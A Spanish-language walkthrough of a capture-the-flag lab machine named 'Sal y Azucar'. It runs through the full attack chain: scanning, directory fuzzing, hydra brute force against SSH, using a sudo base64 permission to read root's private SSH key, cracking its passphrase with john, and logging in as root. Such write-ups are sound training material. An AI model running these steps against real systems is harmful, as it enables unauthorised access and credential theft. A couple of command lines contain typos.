Máquina: Sal y Azucar
SO: Linux
Dificultad: Facil
Descarga


img

1. Escaneo dispositivos en la red.

sudo arp-scan -I enp2s0 --localnet

img

2. Escaneo puertos y servicios en la maquina.

sudo nmpa -p- --open -n -Pn -sCV --min-rate=5000 -T5 192.168.1.6

img

3. En la web tenemos el apache por defecto.

http://192.168.1.6

img

4. Hago fuzzing de directorios y archivos.

gobuster dir -u http://192.168.1.6/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt -q

img

5. Dentro de summary encuentro un html, este me da un mensaje.

http://192.168.1.6/summary/summary.html

img

6. Tras no tener mas nada, hago bruteforce al ssh tanto al usuario como la contraseña.

hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /user/share/wordlists/rockyou.txt ssh://192.168.1.6

img

7. Accedo por el ssh.

ssh info@192.168.1.6

img

8. Revisando los permisos sudo.

sudo -l

img

9. Ya que podemos ejecutarlo como root, encodeo y decodeo el id_rsa de root.

sudo base64 /root/.ssh/id_rsa | base64 -d

img

10. Crackeando un passphrase del id_rsa de root.

10.1- Lo guardo en un archivo

nano id_rsa

img

10.2- Usando john para encontrar el passphrase

ssh2john id_rsa > key

john --wordlist=/usr/share/wordlists/rockyou.txt key

img

11. Obteniendo el super usuario.

11.1- Le doy los permisos pertinentes la idrsa

chmod 600 id_rsa

img

11.2- Accediendo por ssh

ssh -i id_rsa root@192.168.1.6

img


Finalizado.